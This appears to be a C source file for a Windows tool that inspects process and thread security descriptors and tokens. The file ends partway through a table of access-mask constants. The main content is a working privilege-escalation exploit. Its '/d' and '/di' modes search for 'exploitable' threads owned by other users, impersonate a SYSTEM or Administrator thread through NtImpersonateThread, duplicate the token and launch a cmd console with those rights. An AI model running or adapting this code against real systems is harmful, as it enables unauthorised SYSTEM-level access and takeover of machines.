#include <windows.h>
#include <stdio.h>
#include <mbstring.h>
#include <Aclapi.h>
#include <Sddl.h>
#include "tlhelp32.h"
#include <Ntsecapi.h>

#define pusherr {DWORD __err = GetLastError();{
#define poperr  }SetLastError(__err);}
#define emsgbycode( errcode, pmsg ) pusherr; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, NULL, errcode, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)(&(pmsg)), 0, NULL ); poperr;
#define emsg( pmsg ) emsgbycode( GetLastError(), pmsg )
#define ntemsg( status, pmsg ) pusherr;FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS|FORMAT_MESSAGE_FROM_HMODULE, GetModuleHandleA("NTDLL.DLL"), status, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)(&(pmsg)), 0, NULL );poperr;

DiscoverAll( /*out*/ DWORD * pbest_sys_thread_id );
DiscoverInProcess( DWORD pid, PCSTR pszProcessName );
ShowProcessSerucityInfo( DWORD pid );
ShowProcessSerucityInfoEx( DWORD pid, PCSTR pszProcessName, BOOL bShowChildThreads );
ShowThreadSecurityInfo( DWORD tid );
ImpersonateThread( DWORD tid );
BOOL IsProcessExploitTarget( DWORD pid, BOOL * pbCanOpenProcess );
BOOL IsThreadExploitTarget( DWORD tid, BOOL bIsProcessExploitTarget, /*out*/ DWORD * pbest_sys_thread_id );
SID * GetCurrentUserSid();
ShowObjectSecurityInfo( HANDLE hHandle, PCSTR pszPrompt );
ShowTokenSecurityInfo( HANDLE hToken, PCSTR pszPrompt );
void listAllConstants();
GetTokenUser( HANDLE hToken, char * pszUser );
BOOL EnableOpenAllProcessPrivilege();

LONG WINAPI MyNtImpersonateThread(
    HANDLE ImpersonatingThreadHandle, 
    HANDLE ImpersonatedThreadHandle );

void main( int argc, char ** argv )
{
    DWORD id;
    int ia = 1;

    if( argc < ia+1 ) goto usage;

    if( strcmpi( argv[ia], "/d" )==0 )
    {
        ia++;
        if( argc >= ia+1 )
        {
            id = strtoul( argv[ia], 0,0 );
            DiscoverInProcess( id, argv[ia] );
        }
        else{
            DiscoverAll( NULL );
        }
    }
    else if( strcmpi( argv[ia], "/p" )==0 )
    {
        char * pszProcessName;

        ia++;
        if( argc < ia+1 ) goto usage;
        id = strtol(argv[ia],0,0);
        pszProcessName = argv[ia];

        EnableOpenAllProcessPrivilege();

        ia++;
        if( argc >= ia+1 )
        {
            if( 0 == strcmp( argv[ia], "/t" ) )
            {
                ShowProcessSerucityInfoEx( id, pszProcessName, TRUE );
            }
            else goto usage;
        }
        else{
            ShowProcessSerucityInfoEx( id, pszProcessName, FALSE );
        }
    }
    else if( strcmpi( argv[ia], "/t" )==0 )
    {
        ia++;
        if( argc < ia+1 ) goto usage;
        id = strtol(argv[ia],0,0);

        EnableOpenAllProcessPrivilege();

        ia++;
        if( argc >= ia+1 )
        {
            if( 0 == strcmpi( argv[ia], "/i" ) )
            {
                ShowThreadSecurityInfo( id );
                ImpersonateThread( id );
            }
            else goto usage;
        }
        else{
            ShowThreadSecurityInfo( id );
        }
    }
    else if( strcmpi( argv[ia], "/di" )==0 )
    {
        DiscoverAll( &id );
        if( id )
        {
            ShowThreadSecurityInfo( id );
            ImpersonateThread( id );
        }
        else{
            fprintf( stderr, "No any exploitable system thread\n" );
        }
    }
    else if( strcmpi( argv[ia], "/c" )==0 )
    {
        listAllConstants();
    }
    else 
        goto usage;

    return;
usage:
    {
    char * p = (char*)_mbsrchr( argv[0], '\\' );
    if( ! p ) p = argv[0];
    else p = p++;

    fprintf( stderr, 
        "Usage:\n" 
        "    Show security information of process/thread/token, or impersonate thread\n"
        "Command-Line:\n" 
        "    %s /d                (discover all exploitable process/thread)\n" 
        "    %s /d ProcessId      (discover exploitable thread of the process)\n" 
        "    %s /d ProcessName    (discover exploitable thread of the process)\n" 
        "    %s /p ProcessId      (show the process security info)\n" 
        "    %s /p ProcessName    (show the process security info)\n" 
        "    %s /p ProcessId   /t (+ show all child threads security info)\n" 
        "    %s /p ProcessName /t (+ show all child threads security info)\n" 
        "    %s /t ThreadId       (show the thread security info)\n" 
        "    %s /t ThreadId /i    (+ impersonate the thread security context)\n" 
        "    %s /di               (auto choose a SYSTEM thread to impersonate)\n" 
        "    %s /c                (list some concerned constants)\n" 
        ,p,p,p,p,p,p,p,p,p,p,p,p,p,p,p,p,p,p,p,p
        );
    }
}

ShowThreadSecurityInfo( DWORD tid )
{
    HANDLE hThread;
    HANDLE hToken;
    char szPrompt[128];
    char * pmsg;

    hThread = OpenThread( MAXIMUM_ALLOWED, 0, tid );
    if( hThread )
    {
        sprintf( szPrompt, "thread %d", tid );
        ShowObjectSecurityInfo( hThread, szPrompt );

        sprintf( szPrompt, "thread %d Token", tid );
        if( OpenThreadToken( hThread, MAXIMUM_ALLOWED, 0, &hToken ) )
        {
            ShowObjectSecurityInfo( hToken, szPrompt );
            CloseHandle( hToken );
        }
        else if( GetLastError() == ERROR_NO_TOKEN ){
            printf( "%s:\n", szPrompt );
            printf( "  NULL( use PrimaryToken: token of process )\n" );
        }
        else{
            emsg( pmsg );
            fprintf( stderr, "OpenThreadToken(%d) Error %d: %s", tid, GetLastError(), pmsg );
            LocalFree( pmsg );
        }
    }
    else if( GetLastError() == ERROR_INVALID_PARAMETER ){
        fprintf( stderr, "No such thread\n" );
    }
    else{
        emsg( pmsg );
        fprintf( stderr, "OpenThread(%d) Error %d: %s", tid, GetLastError(), pmsg );
        LocalFree( pmsg );
    }
}

ImpersonateThread( DWORD tid )
{
    HANDLE hThread;
    HANDLE hToken;
    char * pmsg;
    LONG nts;

    hThread = OpenThread( MAXIMUM_ALLOWED, 0, tid );
    if( hThread )
    {
        nts = MyNtImpersonateThread( GetCurrentThread(), hThread );
        if( nts < 0 ){
            ntemsg( nts, pmsg );
            fprintf( stderr, "NtImpersonateThread ErrorStatus 0x%08x: %s", nts, pmsg );
            LocalFree( pmsg );
        }
        else{
            printf( "Impersonate OK\n" );

            if( OpenThreadToken( GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hToken ) )
            {
                HANDLE hDupToken;

                if( DuplicateTokenEx( hToken, MAXIMUM_ALLOWED, 0, SecurityImpersonation, TokenPrimary, &hDupToken ) )
                {
                    STARTUPINFO stinf = {sizeof(stinf)};
                    PROCESS_INFORMATION pinf;
                    char szCmdLine[4096] = {0};
                    char szUser[1024] = {0};

                    ShowObjectSecurityInfo( hToken, "Impersonated token" );
                    ShowTokenSecurityInfo( hToken, "Impersonated token" );

                    GetTokenUser( hDupToken, szUser );
                    sprintf( szCmdLine, 
                        "cmd /K "
                        "echo --------------------------------- Welcome! ---------------------------------- & "
                        "echo  Current user id: %s & "
                        "echo  To operate files like explorer, execute following command: & "
                        "echo       \"%ProgramFiles%\\Internet Explorer\\Iexplore\" C:\\ & "
                        "echo  OK, let's begin! & "
                        "echo ----------------------------------------------------------------------------- & "
                        ,szUser
                    );

                    if( CreateProcessAsUser( hDupToken, 0, szCmdLine, 0,0,0,CREATE_NEW_CONSOLE,0,0,&stinf,&pinf ) )
                    {
                        printf( 
                            "\nSuccessfully created a new console!\n"
                            "The new console runs in the same security context as thread(%d)\n"
                            "Detail security context information is listed above( at: Impersonated token...)\n"
                            ,tid );
                        CloseHandle( pinf.hProcess );
                        CloseHandle( pinf.hThread );
                    }
                    else{
                        emsg( pmsg );
                        fprintf( stderr, "CreateProcessAsUser Error %d: %s", GetLastError(), pmsg );
                        LocalFree( pmsg );
                    }

                    CloseHandle( hDupToken );
                }
                else{
                    emsg( pmsg );
                    fprintf( stderr, "DuplicateTokenEx(CurrentThreadToken) Error %d: %s", GetLastError(), pmsg );
                    LocalFree( pmsg );
                }

                CloseHandle( hToken );
            }
            else{
                emsg( pmsg );
                fprintf( stderr, "OpenThreadToken(Current) Error %d: %s",  GetLastError(), pmsg );
                LocalFree( pmsg );
            }
        }

        RevertToSelf();
    }
    else if( GetLastError() == ERROR_INVALID_PARAMETER ){
        fprintf( stderr, "No such thread\n" );
    }
    else{
        emsg( pmsg );
        fprintf( stderr, "OpenThread(%d) Error %d: %s", tid, GetLastError(), pmsg );
        LocalFree( pmsg );
    }
}

ShowProcessSerucityInfo( DWORD pid )
{
    HANDLE hProcess;
    HANDLE hToken;
    char szPrompt[128];
    char * pmsg;

    hProcess = OpenProcess( MAXIMUM_ALLOWED, 0, pid );
    if( hProcess )
    {
        sprintf( szPrompt, "process %d", pid );
        ShowObjectSecurityInfo( hProcess, szPrompt );

        if( OpenProcessToken( hProcess, MAXIMUM_ALLOWED, &hToken ) )
        {
            sprintf( szPrompt, "process %d Token", pid );
            ShowObjectSecurityInfo( hToken, szPrompt );
            CloseHandle( hToken );
        }
        else{
            emsg( pmsg );
            fprintf( stderr, "OpenProcessToken(%d) Error %d: %s",  pid, GetLastError(), pmsg );
            LocalFree( pmsg );
        }
    }
    else if( GetLastError() == ERROR_INVALID_PARAMETER ){
        fprintf( stderr, "No such process\n" );
    }
    else{
        emsg( pmsg );
        fprintf( stderr, "OpenProcess(%d) Error %d: %s", pid, GetLastError(), pmsg );
        LocalFree( pmsg );
    }
}

ShowProcessSerucityInfoEx( DWORD pid, PCSTR pszProcessName, BOOL bShowChildThreads )
{
    HANDLE hSnap;
    PROCESSENTRY32 pe = {0};
    THREADENTRY32 te = {0};

    if( ! bShowChildThreads && pid )
        return ShowProcessSerucityInfo( pid );

    hSnap = CreateToolhelp32Snapshot( (pid?0:TH32CS_SNAPPROCESS)|(bShowChildThreads?TH32CS_SNAPTHREAD:0), 0 );
    if( hSnap != INVALID_HANDLE_VALUE )
    {
        if( pid == 0 )
        {
            pe.dwSize = sizeof(PROCESSENTRY32); 
            if( Process32First( hSnap, &pe ) ) 
            {
                do
                {
                    if( strcmpi( pe.szExeFile, pszProcessName ) == 0 ){
                        pid = pe.th32ProcessID;
                        break;
                    }
                    else{
                        char szTmp[128] = {0};
                        unsigned char * p;
                        p = _mbsrchr( (unsigned char*)pe.szExeFile, '.' );
                        if( p )
                        {
                            strncpy( szTmp, pe.szExeFile, p-pe.szExeFile );
                            if( strcmpi( szTmp, pszProcessName ) == 0 ){
                                pid = pe.th32ProcessID;
                                break;
                            }
                        }
                    }
                }
                while( Process32Next( hSnap, &pe ) );
            }
        }

        if( pid == 0 ){
            fprintf( stderr, "No such process\n" );
        }
        else
        {
            ShowProcessSerucityInfo( pid );

            if( bShowChildThreads )
            {
                te.dwSize = sizeof(THREADENTRY32);
                if( Thread32First( hSnap, &te ) )
                {
                    do
                    {
                        if( te.th32OwnerProcessID == pid )
                        {
                            ShowThreadSecurityInfo( te.th32ThreadID );
                        }
                    }
                    while( Thread32Next( hSnap, &te ) );
                }
            }
        }

        CloseHandle( hSnap );
    }
    return 0;
}

BOOL _Discover( 
    HANDLE hSnap, 
    DWORD pid, 
    PCSTR pszProcessName, 
    /*out*/ DWORD * pbest_sys_thread_id )
{
    BOOL bFound = FALSE;
    BOOL bIsProcessExploitTarget;
    BOOL bCanOpenProcess;
    char tmpbuf[256];
    THREADENTRY32 te = {0};
    static BOOL bFirstPrint = TRUE;

    if( pbest_sys_thread_id ) *pbest_sys_thread_id = 0;

    bIsProcessExploitTarget = IsProcessExploitTarget( pid, &bCanOpenProcess );
    if( bIsProcessExploitTarget && bCanOpenProcess )
    {
        bFound = TRUE;
        if( ! pbest_sys_thread_id )
        {
            sprintf( tmpbuf, "-------------exploitable process %4d (%s)--------------------------------------------------------", 
                pid, pszProcessName );
            printf( "%s%.79s\n", bFirstPrint?(bFirstPrint=FALSE,""):"\n", tmpbuf );

            ShowProcessSerucityInfo( pid );
        }
    }

    te.dwSize = sizeof(THREADENTRY32);
    if( Thread32First( hSnap, &te ) )
    {
        do
        {
            if( te.th32OwnerProcessID == pid )
            {
                if( IsThreadExploitTarget( te.th32ThreadID, bIsProcessExploitTarget, pbest_sys_thread_id ) )
                {
                    bFound = TRUE;
                    if( ! pbest_sys_thread_id )
                    {
                        sprintf( tmpbuf, "-------------exploitable thread %4d of process %4d (%s)--------------------------------------------------------", 
                            te.th32ThreadID, pid, pszProcessName );
                        printf( "%s%.79s\n", bFirstPrint?(bFirstPrint=FALSE,""):"\n", tmpbuf );

                        ShowThreadSecurityInfo( te.th32ThreadID );
                    }
                    else if( *pbest_sys_thread_id ){
                        break;
                    }
                }
            }
        }
        while( Thread32Next( hSnap, &te ) );
    }

    return bFound;
}

DiscoverAll( /*out*/ DWORD * pbest_sys_thread_id )
{
    BOOL bFound = FALSE;
    HANDLE hSnap;
    if( pbest_sys_thread_id ) *pbest_sys_thread_id = 0;
    
    hSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS|TH32CS_SNAPTHREAD, 0 );
    if( hSnap != INVALID_HANDLE_VALUE )
    {
        PROCESSENTRY32 pe      = {0};

        pe.dwSize = sizeof(PROCESSENTRY32); 
        if( Process32First( hSnap, &pe ) ) 
        {
            do
            {
                if( _Discover( hSnap, pe.th32ProcessID, pe.szExeFile, pbest_sys_thread_id ) ){
                    bFound = TRUE;
                }

                if( pbest_sys_thread_id && *pbest_sys_thread_id ) {
                    printf( "Choose system thread %d of process %d (%s)\n", *pbest_sys_thread_id, pe.th32ProcessID, pe.szExeFile );
                    break;
                }
            }
            while( Process32Next( hSnap, &pe ) );
        }
        CloseHandle( hSnap );
    }

    if( ! pbest_sys_thread_id )
    {
        if( ! bFound ){
            fprintf( stderr, "No any exploitable process/thread\n" );
        }
    }
    else if( ! *pbest_sys_thread_id ){
        fprintf( stderr, "No any exploitable system thread for choose to impersonate\n" );
    }
}

DiscoverInProcess( DWORD pid, PCSTR pszProcessName )
{
    BOOL bFound = FALSE;
    HANDLE hSnap;
    PROCESSENTRY32 pe      = {0};

    hSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS|TH32CS_SNAPTHREAD, 0 );
    if( hSnap != INVALID_HANDLE_VALUE )
    {
        pe.dwSize = sizeof(PROCESSENTRY32); 
        if( Process32First( hSnap, &pe ) ) 
        {
            do
            {
                if( pid == 0 )
                {
                    if( strcmpi( pe.szExeFile, pszProcessName ) == 0 ){
                        pid = pe.th32ProcessID;
                    }
                    else{
                        char szTmp[128] = {0};
                        unsigned char * p;
                        p = _mbsrchr( (unsigned char*)pe.szExeFile, '.' );
                        if( p )
                        {
                            strncpy( szTmp, pe.szExeFile, p-pe.szExeFile );
                            if( strcmpi( szTmp, pszProcessName ) == 0 )
                                pid = pe.th32ProcessID;
                        }
                    }
                }

                if( pid && pe.th32ProcessID == pid )
                {
                    if( _Discover( hSnap, pe.th32ProcessID, pe.szExeFile, NULL ) )
                        bFound = TRUE;
                    break;
                }
            }
            while( Process32Next( hSnap, &pe ) );
        }
        CloseHandle( hSnap );
    }

    if( pid == 0 || pe.th32ProcessID != pid ){
        fprintf( stderr, "No such process\n" );
    }
    else if( ! bFound ){
        fprintf( stderr, "No any exploitable process/thread of this process\n" );
    }
}

BOOL IsProcessExploitTarget( DWORD pid, BOOL * pbCanOpenProcess )
{
    BOOL bIsProcessExploitTarget = FALSE;
    *pbCanOpenProcess = FALSE;

    if( pid )
    {
        HANDLE hProcess;
        char * pmsg;

        hProcess = OpenProcess( MAXIMUM_ALLOWED, 0, pid );
        if( hProcess )
        {
            HANDLE hToken;

            *pbCanOpenProcess = TRUE;

            if( OpenProcessToken( hProcess, MAXIMUM_ALLOWED, &hToken ) )
            {
                TOKEN_USER * tokuser;
                char tmpbuf[1024];
                int tmp;

                tokuser = (TOKEN_USER*)tmpbuf;
                if( GetTokenInformation( hToken, TokenUser, tokuser, sizeof(tmpbuf), &tmp ) )
                {
                    if( ! EqualSid( tokuser->User.Sid, GetCurrentUserSid() ) )
                    {
                        bIsProcessExploitTarget = TRUE;
                    }
                }
                else if( GetLastError() == ERROR_ACCESS_DENIED )
                {
                    bIsProcessExploitTarget = TRUE;
                }
                else if( GetLastError() != ERROR_INVALID_PARAMETER )
                {
                    emsg( pmsg );
                    fprintf( stderr, "GetTokenInformation(pid=%d) Error %d: %s", pid, GetLastError(), pmsg );
                    LocalFree( pmsg );
                }

                CloseHandle( hToken );
            }
            else if( GetLastError() == ERROR_ACCESS_DENIED )
            {
                bIsProcessExploitTarget = TRUE;
            }
            else if( GetLastError() != ERROR_INVALID_PARAMETER )
            {
                emsg( pmsg );
                fprintf( stderr, "OpenProcessToken(%d) Error %d: %s", pid, GetLastError(), pmsg );
                LocalFree( pmsg );
            }

            CloseHandle( hProcess );
        }
        else if( GetLastError() == ERROR_ACCESS_DENIED )
        {
            bIsProcessExploitTarget = TRUE;
        }
        else if( GetLastError() != ERROR_INVALID_PARAMETER )
        {
            emsg( pmsg );
            fprintf( stderr, "OpenProcess(%d) Error %d: %s", pid, GetLastError(), pmsg );
            LocalFree( pmsg );
        }
    }
    return bIsProcessExploitTarget;
}

BOOL IsThreadExploitTarget( 
    DWORD tid, 
    BOOL bIsProcessExploitTarget, 
    /*out*/ DWORD * pbest_sys_thread_id )
{
    BOOL bIsThreadExploitTarget = FALSE;
    HANDLE hThread;
    char * pmsg;
    if( pbest_sys_thread_id ) *pbest_sys_thread_id = 0;

    hThread = OpenThread( MAXIMUM_ALLOWED, 0, tid );
    if( hThread )
    {
        HANDLE hToken;

        if( bIsProcessExploitTarget )
        {
            bIsThreadExploitTarget = TRUE;

            if( pbest_sys_thread_id )
            {
                LONG nts = MyNtImpersonateThread( GetCurrentThread(), hThread );
                if( nts < 0 ){
                    /*
                    ntemsg( nts, pmsg );
                    fprintf( stderr, "NtImpersonateThread ErrorStatus 0x%08x: %s", nts, pmsg );
                    LocalFree( pmsg );
                    */
                }
                else{
                    if( OpenThreadToken( GetCurrentThread(), MAXIMUM_ALLOWED, TRUE, &hToken ) )
                    {
                        char szUser[512];
                        GetTokenUser( hToken, szUser );

                        if( strcmpi( szUser, "NT AUTHORITY\\SYSTEM" ) == 0 ||
                            strcmpi( szUser, "BUILTIN\\Administrator" ) == 0 )
                        {
                            *pbest_sys_thread_id = tid;
                        }

                        CloseHandle( hToken );
                    }
                    else{
                        /*
                        emsg( pmsg );
                        fprintf( stderr, "OpenThreadToken(Current) Error %d: %s",  GetLastError(), pmsg );
                        LocalFree( pmsg );
                        */
                    }

                    RevertToSelf();
                }
            }
        }
        else if( OpenThreadToken( hThread, MAXIMUM_ALLOWED, FALSE, &hToken ) )
        {
            TOKEN_USER * tokuser;
            char tmpbuf[1024];
            int tmp;

            bIsThreadExploitTarget = TRUE;

            tokuser = (TOKEN_USER*)tmpbuf;
            if( GetTokenInformation( hToken, TokenUser, tokuser, sizeof(tmpbuf), &tmp ) )
            {
                if( EqualSid( tokuser->User.Sid, GetCurrentUserSid() ) ){
                    bIsThreadExploitTarget = FALSE;
                }
            }
            else if( GetLastError() == ERROR_ACCESS_DENIED )
            {
            }
            else if( GetLastError() != ERROR_INVALID_PARAMETER )
            {
                emsg( pmsg );
                fprintf( stderr, "GetTokenInformation(tid=%d) Error %d: %s", tid, GetLastError(), pmsg );
                LocalFree( pmsg );
            }

            CloseHandle( hToken );
        }
        else if( GetLastError() == ERROR_NO_TOKEN )
        {
        }
        else if( GetLastError() == ERROR_ACCESS_DENIED )
        {
        }
        else if( GetLastError() != ERROR_INVALID_PARAMETER )
        {
            emsg( pmsg );
            fprintf( stderr, "OpenThreadToken(%d) Error %d: %s", tid, GetLastError(), pmsg );
            LocalFree( pmsg );
        }

        CloseHandle( hThread );
    }
    else if( GetLastError() == ERROR_ACCESS_DENIED )
    {
    }
    else if( GetLastError() != ERROR_INVALID_PARAMETER )
    {
        emsg( pmsg );
        fprintf( stderr, "OpenThread(%d) Error %d: %s", tid, GetLastError(), pmsg );
        LocalFree( pmsg );
    }

    return bIsThreadExploitTarget;
}

SID * GetCurrentUserSid()
{
    static char tmpbuf[1024];
    static SID * sid = NULL;
    char * pmsg;
    HANDLE hToken;

    if( sid ) return sid;

    if( OpenProcessToken( GetCurrentProcess(), MAXIMUM_ALLOWED, &hToken ) )
    {
        TOKEN_USER * tokuser;
        int tmp;

        tokuser = (TOKEN_USER*)tmpbuf;
        if( GetTokenInformation( hToken, TokenUser, tokuser, sizeof(tmpbuf), &tmp ) )
        {
            sid = tokuser->User.Sid;
        }
        else
        {
            emsg( pmsg );
            fprintf( stderr, "GetTokenInformation(pid=Current) Error %d: %s", GetLastError(), pmsg );
            LocalFree( pmsg );
        }

        CloseHandle( hToken );
    }
    else
    {
        emsg( pmsg );
        fprintf( stderr, "OpenProcessToken(Current) Error %d: %s", GetLastError(), pmsg );
        LocalFree( pmsg );
    }

    return sid;
}

ShowObjectSecurityInfo( HANDLE hHandle, PCSTR pszPrompt )
{
    DWORD   dwErr;
    DWORD       i;
    char szSidName[128] = {0};
    char szSidDomain[128] = {0};
    SID_NAME_USE    eUse;
    DWORD cbSidName;
    DWORD cbSidDomain;
    SECURITY_DESCRIPTOR * pSD;
    ACL * dacl;
    char * pmsg;

    if( 0 == (dwErr=GetSecurityInfo( hHandle, 
        SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,NULL, &dacl, NULL, &pSD )) )
    {
        PCHAR   pszSD;
        DWORD   cbszSD;

        if( dacl )
        {
            if( ConvertSecurityDescriptorToStringSecurityDescriptor(
                dacl, 
                SDDL_REVISION_1, 
                DACL_SECURITY_INFORMATION|OWNER_SECURITY_INFORMATION|GROUP_SECURITY_INFORMATION, 
                &pszSD,
                &cbszSD
                ) )
            {
                printf( "%s SDDL: %s\n", pszPrompt, pszSD );
                LocalFree( pszSD );
            }
            else{
                if( GetLastError() != ERROR_UNKNOWN_REVISION ){
                    emsg( pmsg );
                    fprintf( stderr, "%s SDDL: ? Error %d: %s", pszPrompt, GetLastError(), pmsg );
                    LocalFree( pmsg );
                }
            }

            printf( "%s DACL:\n", pszPrompt );

            for( i = 0; i < dacl->AceCount; i++ )
            {
                ACCESS_ALLOWED_ACE *pAce;
                cbSidName = sizeof(szSidName)-1;
                cbSidDomain = sizeof(szSidDomain)-1;

                GetAce( dacl, i, &pAce );

                if( LookupAccountSid( NULL, &pAce->SidStart, szSidName, &cbSidName, szSidDomain, &cbSidDomain, &eUse ) ){
                    printf( "  ACE%d Mask=0x%08x Flag=0x%08x %s%s%s\n", 
                        i, pAce->Mask, pAce->Header.AceFlags, szSidDomain, szSidName[0]?"\\":"", szSidName );
                }else{
                    char * pszSid;
                    if( ConvertSidToStringSid( &pAce->SidStart, &pszSid ) ){
                        printf( "  ACE%d Mask=0x%08x Flag=0x%08x %s\n", i, 
                            pAce->Mask, pAce->Header.AceFlags, pszSid );
                        LocalFree( pszSid );
                    }else{
                        printf("  ACE%d Mask=0x%08x Flag=0x%08x ?\n", i, 
                            pAce->Mask, pAce->Header.AceFlags, szSidName );
                    }
                }
            }
        }
        else{
            printf( "%s DACL:\n", pszPrompt );
            printf( "  NULL( Everyone FullAccess ):\n" );
        }

        LocalFree( pSD );
    }
    else if( dwErr == ERROR_ACCESS_DENIED ){
    }
    else{
        emsgbycode( dwErr, pmsg );
        fprintf( stderr, "%s SecurityDescriptor = ? Error %d: %s", pszPrompt, dwErr, pmsg );
        LocalFree( pmsg );
    }
}

ShowTokenSecurityInfo( HANDLE hToken, PCSTR pszPrompt )
{
    SECURITY_IMPERSONATION_LEVEL impLev;
    DWORD   tmp;
    DWORD       i;
    TOKEN_TYPE  toktype;
    char    tmpBuf[4096] = {0};
    char szSidName[128] = {0};
    char szSidDomain[128] = {0};
    SID_NAME_USE    eUse;
    DWORD cbSidName;
    DWORD cbSidDomain;
    char * pmsg;

    TOKEN_OWNER * owner = (TOKEN_OWNER*)tmpBuf;
    TOKEN_USER * user = (TOKEN_USER*)tmpBuf;
    TOKEN_PRIVILEGES * privs = (TOKEN_PRIVILEGES *)tmpBuf;
    TOKEN_DEFAULT_DACL * defDacl = (TOKEN_DEFAULT_DACL*)tmpBuf;

    printf( "%s detail information:\n", pszPrompt );
    if( GetTokenInformation( hToken, TokenUser, user, sizeof(tmpBuf), &tmp ) )
    {
        cbSidName = sizeof(szSidName)-1;
        cbSidDomain = sizeof(szSidDomain)-1;
        LookupAccountSid( NULL, user->User.Sid, szSidName, &cbSidName, szSidDomain, &cbSidDomain, &eUse );
        printf( "  TokenUser = %s\\%s\n", szSidDomain, szSidName );
    }else{
        emsg( pmsg );
        printf( "  TokenUser = ? Error %d: %s", GetLastError(), pmsg );
        LocalFree( pmsg );
    }

    if( GetTokenInformation( hToken, TokenOwner, owner, sizeof(tmpBuf), &tmp ) )
    {
        cbSidName = sizeof(szSidName)-1;
        cbSidDomain = sizeof(szSidDomain)-1;
        LookupAccountSid( NULL, owner->Owner, szSidName, &cbSidName, szSidDomain, &cbSidDomain, &eUse );
        printf( "  TokenOwner = %s\\%s\n", szSidDomain, szSidName );
    }else{
        emsg( pmsg );
        printf( "  TokenOwner = ? Error %d: %s", GetLastError(), pmsg );
        LocalFree( pmsg );
    }

    if( GetTokenInformation( hToken, TokenType, &toktype, sizeof(toktype), &tmp ) )
    {
        printf( "  TokenType = %s\n", toktype==TokenPrimary?"Primary":"Impersonation" );
    }
    else{
        emsg( pmsg );
        fprintf( stderr, "  TokenType = ? Error %d: %s", GetLastError(), pmsg );
        LocalFree( pmsg );
    }

    if( GetTokenInformation( hToken, TokenImpersonationLevel, &impLev, sizeof(impLev), &tmp ) )
    {
        printf( "  ImpersonateLevel = %d\n", impLev );
    }
    else{
        emsg( pmsg );
        fprintf( stderr, "  ImpersonateLevel = ? Error %d: %s", GetLastError(), pmsg );
        LocalFree( pmsg );
    }

    if( GetTokenInformation( hToken, TokenPrivileges, privs, sizeof(tmpBuf), &tmp ) )
    {
        for( i = 0; i < privs->PrivilegeCount; i++ )
        {
            char    szPrivName[256] = {0};
            tmp = sizeof(szPrivName)-1;
            LookupPrivilegeName( NULL, &privs->Privileges[i].Luid, szPrivName, &tmp );
            printf( "  Privilege %s = %d\n", szPrivName, privs->Privileges[i].Attributes );
        }
    }
    else{
        emsg( pmsg );
        fprintf( stderr, "GetTokenInformation Error %d: %s", GetLastError(), pmsg );
        LocalFree( pmsg );
    }
}

GetTokenUser( HANDLE hToken, char * pszUser )
{
    DWORD   tmp;
    char    tmpBuf[4096] = {0};
    char szSidName[256] = {0};
    char szSidDomain[256] = {0};
    SID_NAME_USE    eUse;
    DWORD cbSidName;
    DWORD cbSidDomain;

    TOKEN_USER * user = (TOKEN_USER*)tmpBuf;

    if( GetTokenInformation( hToken, TokenUser, user, sizeof(tmpBuf), &tmp ) )
    {
        cbSidName = sizeof(szSidName)-1;
        cbSidDomain = sizeof(szSidDomain)-1;

        if( LookupAccountSid( NULL, user->User.Sid, szSidName, &cbSidName, szSidDomain, &cbSidDomain, &eUse ) )
        {
            sprintf( pszUser, "%s\\%s", szSidDomain, szSidName );
        }
        else{
            char * pszSid;
            if( ConvertSidToStringSid( user->User.Sid, &pszSid ) ){
                sprintf( pszUser, "%s", pszSid );
                LocalFree( pszSid );
            }else{
                sprintf( pszUser, "?" );
            }
        }
    }else{
        sprintf( pszUser, "?" );
    }
}

LONG WINAPI MyNtImpersonateThread(
    HANDLE ImpersonatingThreadHandle, 
    HANDLE ImpersonatedThreadHandle )
{
    static LONG (WINAPI *pNtImpersonateThread)(
        HANDLE ImpersonatingThreadHandle, 
        HANDLE ImpersonatedThreadHandle, 
        PSECURITY_QUALITY_OF_SERVICE pQoS) = NULL;
    static SECURITY_QUALITY_OF_SERVICE QoS =
    {sizeof(QoS), DEFAULT_IMPERSONATION_LEVEL, SECURITY_DYNAMIC_TRACKING, FALSE};

    if( ! pNtImpersonateThread ){
        *(PVOID*)&pNtImpersonateThread = (PVOID)GetProcAddress( GetModuleHandle("NTDLL"), "NtImpersonateThread" );
    }
    return  pNtImpersonateThread(
            ImpersonatingThreadHandle, 
            ImpersonatedThreadHandle, 
            &QoS);
}

typedef struct{
    char szName[64];
    int iValue;
}
NAME_VALUE;

NAME_VALUE gNameValueAry[] =
{
"------------- Generic access masks -----------------------",0,
"GENERIC_ALL",GENERIC_ALL,
"GENERIC_READ",GENERIC_READ,
"GENERIC_EXECUTE",GENERIC_EXECUTE,
"GENERIC_WRITE",GENERIC_WRITE,
"DELETE",DELETE,
"READ_CONTROL",READ_CONTROL,
"WRITE_DAC",WRITE_DAC,
"WRITE_OWNER",WRITE_OWNER,
"SYNCHRONIZE",SYNCHRONIZE,
"ACCESS_SYSTEM_SECURITY",ACCESS_SYSTEM_SECURITY,
"MAXIMUM_ALLOWED",MAXIMUM_ALLOWED,
"------------- Process access masks -----------------------",0,
"PROCESS_ALL_ACCESS",PROCESS_ALL_ACCESS,
"PROCESS_TERMINATE",PROCESS_TERMINATE,
"PROCESS_CREATE_THREAD",PROCESS_CREATE_THREAD,
"PROCESS_SET_SESSIONID",PROCESS_SET_SESSIONID,
"PROCESS_VM_OPERATION",PROCESS_VM_OPERATION,
"PROCESS_VM_READ",PROCESS_VM_READ,
"PROCESS_VM_WRITE",PROCESS_VM_WRITE,
"PROCESS_DUP_HANDLE",PROCESS_DUP_HANDLE,
"PROCESS_CREATE_PROCESS",PROCESS_CREATE_PROCESS,
"PROCESS_SET_QUOTA",PROCESS_SET_QUOTA,
"PROCESS_SET_INFORMATION",PROCESS_SET_INFORMATION,
"PROCESS_QUERY_INFORMATION",PROCESS_QUERY_INFORMATION,
"PROCESS_SUSPEND_RESUME",PROCESS_SUSPEND_RESUME,
"------------- Thread access masks -------------------------",0,
"THREAD_ALL_ACCESS",THREAD_ALL_ACCESS,
